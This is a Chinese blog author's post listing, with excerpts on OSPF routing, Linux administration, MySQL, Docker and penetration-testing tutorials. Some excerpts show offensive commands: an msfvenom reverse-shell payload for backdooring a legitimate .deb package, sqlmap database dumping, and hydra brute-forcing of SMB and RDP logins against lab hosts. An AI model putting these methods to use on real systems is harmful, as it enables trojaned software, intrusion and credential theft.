- 博客(38)
- 收藏
- 关注
RSS订阅原创 Msfvenom制作deb软件包生成后门
一、下载正常软件包apt --download-only install freesweep //下载但不安装软件包freesweep二、复制到root用户加目录下为了便于后续操作,复制该软件包到root用户加目录下默认apt下载后软件包位置路径为:/var/cache/apt/archives/四、解压软件包将deb包解压五、生成恶意代码到软件源文件中msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tc
2021-08-13 16:28:01
590
原创 Metasploit工具框架介绍
一、Metasploit介绍Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有
2021-08-09 00:58:24
917
原创 Sqlmap的基础使用
sqlmap使用方法:测试环境为Kali2021自带的sqlmap工具,目标为靶场环境。1、获取后台所有库sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ --dbs执行效果如下:已成功获取到所有库名2、获取对应库中的表sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ -D cms --tables执行效果如下所示:已成功获取到指定库的所有表信息3、获取对应库以
2021-07-28 18:54:26
247
原创 Hybra爆破工具应用
hydra 远程破解工具一、常用参数:-l 后面跟着 具体的用户名-p 后面跟着 具体的密码-L 后面跟着 用户字典-P 后面跟着 密码字典二、案例展示1、爆破smb服务hydra -l Administrator -P pass.txt smb://172.172.11.2092、爆破3389远程桌面hydra -l Administrator -P pass.txt rdp://172.172.11.209 -V3、一般爆破RDP最后别选择多进程、多线程hydra -l Adm
2021-07-27 21:09:50
641
原创 Centos环境下安装Docker环境
Docker 目前支持 CentOS 7 及以后的版本 。 系统的要求跟 Ubuntu 情况类似, 64 位操作系统,内核版本至少为 3.10 。首先,为了方便添加软件源,以及支持 device mapper 存储类型,安装如下软件包:
2021-07-26 21:57:34
211
原创 mysql数据库所有基本操作语句
一、库的操作1、查看所有的数据库名称Show databases;2、创建新的数据库Create database test;3、查看数据库的属性show create database test;4、进入数据库use test;5、删除数据库drop database tes1t;二、数据表的操作1、查看当前数据库下所有的数据表名称Show tables;2、创建新的数据表Create table 数据表名(字段名);例: create table tb_dem
2021-07-26 21:41:15
1173
原创 HC120115003 OSPF外部路由
一、外部路由计算过程1、外部路由引入在图中,RTA上配置了一条静态路由,目的网络是10.1.60.0/24,下一跳是RTF。在RTA的OSPF进程下,将配置的静态路由重发布到A公司的OSPF网络中,其中引入外部路由的OSPF路由器叫做ASBR(设备间互访需要路由双向可达,这里仅介绍OSPF网络内获取外部路由的过程)。RTA会生成一条AS-External-LSA(五类LSA),用于描述如何从ASBR到达外部目的地;RTB和RTC会生成一条ASBR-Summary-LSA(四类LSA),用于描述如
2020-10-29 01:41:57
440
1
原创 HC120115001 OSPF域内路由
OSPF中LSA的类型主要有:1、Router-LSA1、Router-LSA描述P2P网络每台OSPF路由器使用一条Router-LSA描述本区域内的链路状态信息。LSA头部的三个字段含义如下:(1)Type:LSA类型,Router-LSA是一类LSA。(2)LS id:链路状态ID。(3)Adv rtr:产生此Router-LSA的路由器Router ID。一条Router-LSA可以描述多条链接,每条链接描述信息由Link ID,Data,Link Type和Metric组成,其关键
2020-10-16 21:44:15
258
原创 HC120115000 OSPF协议基础2_(OSPF基本工作原理)
1、邻居建立过程1、Route-id的标识设备在网络中运行了ospf,需要有一个标识来唯一的确定他的存在,相当于给设备起一个名字,这个名字就叫做Router-id,名字不能相同,Router-id在同一个网络环境中也不能相同,Router-id会在进行邻居建立以及路由更新时唯一的标识路由器的存在。Router-id的选举:(1)以手工配置的为最优。(2)以双UP状态的逻辑接口次之。(3)最后选择双UP状态的物理接口。实际在ensp当中,关于router-id的选择,会首先选择最开始配置的路由器接口
2020-10-16 14:23:16
689
原创 HC120115000 OSPF协议基础1_(RIP在大型网络中部署面临的挑战)
1、大型网络所发生的变化网络规模的扩大随着企业的扩张,网络规模同样处于不断的扩展当中,包括设备数量的增加,业务系统的层出不穷,部门以及分支机构的增加等。网络可靠性要求提高各种应用程序对网络可靠性要求越来越高,网络发生故障后,需要在更短的时间内恢复正常。网络异构化,多厂商设备互联需求在日常的运营维护中,硬件设备不断升级或更新,不同设备之间性能差异较大,设备间互连链路带宽也存在一定的差异。每个企业中的网络设备都不会是单一厂商的,所以会涉及到多厂商设备互联的情况。需要加以解决,这里就需要一种各厂商均
2020-10-16 10:12:24
286
原创 Sqlilabs-Less-1
已根据提示访问主页并且携带ID号信息进行提交,得出如上图所示界面。http://192.168.85.140/sqlilabs/Less-1/index.php?id=11、判断注入点执行中可以看出,是通过get方式提交的参数,可以选择在url栏目中添加注入判断语句进行探测,输入 id=1 and 1=1...
2020-04-18 02:39:09
342
原创 IPsec实验
1、完成基本路由R1:int f0/0ip add 100.1.1.1 255.255.255.0no shutdownint lo 0ip add 192.168.10.1 255.255.255.0ip route 0.0.0.0 0.0.0.0 100.1.1.2R2:int f0/0ip add 100.1.1.1 255.255.255.0no shutdown...
2020-04-15 17:12:33
1100
原创 Windows MS17-010漏洞利用介绍
利用metasploit开源安全漏洞检测工具实现漏洞检测及利用1、metasploit介绍------Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。-...
2020-04-11 00:46:47
3965
2
原创 Windows 基础指令
color 改变cmd颜色ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig 查看ipipconfig /release 释放ipipconfig /renew 重新获得ipsysteminfo 查看系统信息arp -anet view 查看局域网内其他计算机名称Shutd...
2020-04-10 11:32:01
437
1
原创 Windows系统目录、服务、端口、注册表
1、系统目录windows:是Windows系统安装文件所在文件夹,一般用来存储系统安装文件和硬件驱动程序等内容,是系统正常运转的必要保证。program files:指的是程序文件,是Windows 操作系统、以及其它的操作系统各种软件默认安装到的目录。位于C盘分区(“C:\Program Files”,"%ProgramFiles%"),但也可根据用户的需要自定义到别的分区。用户:存放...
2020-04-10 10:22:04
1358
原创 GRE隧道构建
1、底层信息配置通,IP地址配置R1:interface Ethernet0/0 ip address 192.168.1.1 255.255.255.0interface Ethernet0/1 ip address 13.0.0.1 255.255.255.0R2: interface Ethernet0/0 ip address 23.0.0.2 255.255.255...
2020-04-02 21:15:12
912
原创 安装kali Linux
本次安装以kali 2018版本进行演示:1、kali安装包获取,进入kali官网https://www.kali.org/,进入downloads界面中,选择合适的版本进行下载,官网中给定的都是最新的版本。如果需要下载其他历史版本,可以到站点http://old.kali.org/kali-images/当中进行下载。官网提供下载的界面中,分别有kali的原版镜像版,还有对应的虚拟机版...
2020-04-01 20:58:17
809
原创 Linux-网络服务及计划任务
1、网络设置Redhat 7之前网卡的命名为eth0等形式的名称,从Redhat 7开始即命名成为了ens33格式,因为虚拟化技术发展的原因,所以会根据Redhat中ip等信息生成唯一的名称。网口形式:eh0、ens33对应物理接口的网卡,也可以是eth0:1子接口形式,默认也会存在环回口。网络配置文件:/etc/sysconfig/network-scripts/ifcfg-ens33...
2020-04-01 14:31:25
452
原创 Linux-login VS non-login shell and standard Input Output
1、登录shell采用快捷键登录进去的shell,所有采用名字和密码登录的shell采用图形化登录进去的shell采用su - 切换的登录shell2、非登录shell采用su登录用户的shell打开的一个终端,即打开的一个控制界面执行的脚本时采用非登录shell方式执行的any、other、bash、instances其他一些bash情景3、登录shell于非登录she...
2020-03-15 00:24:31
141
原创 Linux-环境变量、特殊符号
一、环境变量1、环境变量,全局下的环境变量(1).在Linux中显示命令提示符“#”或者“”的功能是由变量"”的功能是由变量"”的功能是由变量"PS1"决定的,该变量文件存放于/etc/bashrc中,采用echo可以输入该变量对应的值:echo $PS1。(2).HISTSIZE变量用于定义history命令历史记录条目数量的全局变量,该变量存放在/etc/profile中,可进行查看:...
2020-03-14 23:56:21
3565
原创 Linux-CentOS 7.4密码恢复
~前面讲到了CentOS6当中的密码破解,在升级到7后,对于破解的方法有了一定的改变,下面一起来看看吧!!!将忘记密码的CentOS7操作系统进行重启,重启过程中在系统进行引导时通过键盘任意按键让系统停止进入到默认的启动选项中,最终定格在如下图所示界面,并且在该内核界面敲击字母“e”。在如下界面中,找到开头为linuxl6的这行,如无直接显示,可通过上下翻页进行查找,在改行末尾处加上\r...
2020-03-11 15:26:11
354
原创 Linux-tar文件打包与压缩
.在文件的整理及传输过程中,经常会用到将文件或者文件夹通过打包压缩的方式整理成为一个归档的文件, Windows中用到的压缩解压工具有很多,并且很方便,但是在Linux当中呢,可能会稍微复杂一点,并且方式同样是多样化的。Linux中主要出现的压缩格式及方法如下:文件后缀功能说明*.zipzip程序打包压缩的文件*.rarrar程序打包压缩的文件*.7z...
2020-03-11 15:21:04
4877
1
原创 Linux-CentOS 6.6密码重置和防护
!!!!!!在操作系统使用过程中,难免会有忘记登录密码的情况出现,特别是对于Linux操作系统来说,作为服务器操作系统来说,很多时候都没有必要频繁去执行登录操作,时间长了就会忘记原本的登录密码了,重装系统对于正在运行的业务系统来说肯定是不可能的,这个时候就需要破解登录密码了,其实在Linux操作系统中有自己的密码恢复机制,Linux6.0及之前的版本,密码恢复的过程都是差不多了过程,但是在7...
2020-03-11 14:40:02
453
原创 Linux-vi/vim编辑器的使用
vi/vim编辑器的使用vi(vim)是Linux上非常常用的编辑器,很多Linux发行版都默认安装了vi/vim。vi/vim命令繁多但是如果使用灵活之后将会大大提高效率。vi是“visual interface”的缩写,vim是vi IMproved(增强版的vi)。在一般的系统管理维护中vi就够用,如果想使用代码加亮的话可以使用vim。vi/vim有3个模式:插入模式、命令模式、低行模...
2020-03-11 01:12:03
333
原创 Linux-CentOS6.0系列通过光盘启动恢复密码
特殊情况下,会将Linux操作系统的登录密码忘记,并且在采用单用户模式的情况中也采用了防护措施,无法进入,这个时候可以选择采用光盘模式进行恢复密码。准备光盘镜像文件,如果是在真机中则采用光盘或者U盘刻录的方式,如果是虚拟机当中,那么在虚拟光驱中对镜像文件进行选中,并且将光驱选择成为开机连接。开机时进入到BIOS界面,更改启动方式为优先选择从光盘启动。开机后会看到系统安装的操作界面,...
2020-03-06 16:32:39
601
原创 Linux-隐藏文件权限chattr(特殊文件属性)
1、 管理 Linux 系统中的文件和目录,除了可以设定普通权限和特殊权限外,还可以利用文件和目录具有的一些隐藏属性。chattr 命令,专门用来修改文件或目录的隐藏属性,只有 root 用户可以使用。该命令的基本格式为:[root@localhost ~]# chattr [+ - =] [属性] 文件或目录名+表示给文件或目录添加属性,- 表示移除文件或目录拥有的某些属性,= 表示给文...
2020-03-03 14:18:02
866
原创 Linux-文件ACL访问控制列表的使用
ACL访问控制列表1、开启acl功能(可能某些情况下需要自己手动开启acl)在 CentOS 6.x 系统中 ACL 权限默认是开启的,不需要手工开启。不过,如果你的操作系统不是 CentOS 6.x,那该如何查看 ACL 权限是否开启了呢?可以这样查看:[root@localhost ~]# mount/dev/sda1 on /boot type ext4 (rw)/dev/sd...
2020-03-03 12:07:08
346
原创 Linux-帮助系统与文件系统管理
一、命令运行1、命令语法规则Linux操作系统的操作方式主要以命令行方式为主,也兼容图形化的方式,但是Linux主要是作为服务器操作系统的角色存在,为保证其运行过程中的稳定性,根本方式还是在于命令行的方式去进行。下面来熟悉下命令的运行规则。command 【options 选项】【argument】 参数区别选项与参数:选项是需要加上 -(横杠)做标识,对于参数而言,只是用来表示查看或者打...
2020-02-22 00:11:33
291
原创 Linux-系统安装及使用——CentOS7.0
工具准备:CentOS7.0镜像文件、VMware Workstation Pro12虚拟机安装包,安装包文件可自行到网上进行下载。一、安装流程1、在VMware Workstation创建一台新的虚拟机,选择匹配的系统版本,选择适合该系统运行的硬件性能。选择稍后安装操作系统,上面的选项中第一个需要光驱,进行光盘驱动引导,第二个可选择系统镜像文件,会有内置脚本帮助安装完成该操作系统...
2020-02-19 00:49:46
433
原创 PAP与CHAP认证
一、PPP介绍 PPP(point-to-point protocol)是一种点到点链路层协议,主要用于在全双工的同异步链路上进行点到点的数据传输。##在PPP中主要由三类协议簇组成1、链路控制协议簇(Link Control protocol):主要用来建立、拆除和监控PPP链路。2、网络层控制协议簇(Network control protocol):主要用来协商在该链路上传输的...
2020-02-07 18:04:59
4493
原创 kali linux基本操作
一、APT安装软件apt是一个轻量级但功能十分强大的命令行工具,用于安装和删除软件包,命令为apt-get。apt-get可以对所有安装过的软件做好记录,可以跟中软件版本和软件之间相互依赖的关系。比如利用apt安装谷歌中文输入法,在终端键入如下命令apt-get install fcitx。会出现如下所示如果是已经安装完成的软件,在键入此命令时会去寻找更新。apt其他指令用法:apt-...
2019-08-25 23:58:18
1640
原创 Kali基于debian系统软件源source.list文件格式说明
**在使用kali的过程中,为了保证系统工具的有效的特性,我们会选择更改kali linux的软件更新源地址,默认情况下自带的国外的更新源地址会有一定的延迟,下面来看看关于kali中使用的source.list文件中的更新源地址的格式:** 中科大 Kali 源:deb http://mirrors.ustc.edu.cn/kali kali main non-free contr...
2019-08-20 00:30:16
2101
原创 路由转发操作
学习路由,首先我们需要了解路由在网络中存在的作用,路由代表的作用就是路径选择,路径决策,路由转发。当我们需要从本设备将数据包发往远程网络时,我们必须要知道一件事,我是否知道去往该目的地的路该怎么走,就像我们如果要考CCIE,那么在选择北京作为目的地的时候,你要知道,从我们自身的地方去往北京肯定不仅仅只有一条路可以走,那么在这众多路径中我们必须要有一个衡量标准去选择一条最近的或者说是...
2019-07-11 00:48:54
1928
原创 网络入门、与网络的邂逅
网络技术在社会实践中的作用已经日渐凸显,但是网络技术的学习需从入门开始,说起网络入门,好像也并不是那么容易吧, 哈哈哈哈 下面就来说说网络入门阶段的一些基础知识吧!!! 计算机网络的发展是为生活带来便利的,但是具体体现在那些方面呢,认为最主要的还在于远程数据共享方面,一台计算机连接一条通信线路,就可以实现遥远距离的零连接,可以实现遥远距离数据信息的在线实时传输...
2019-07-05 01:39:35
275
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人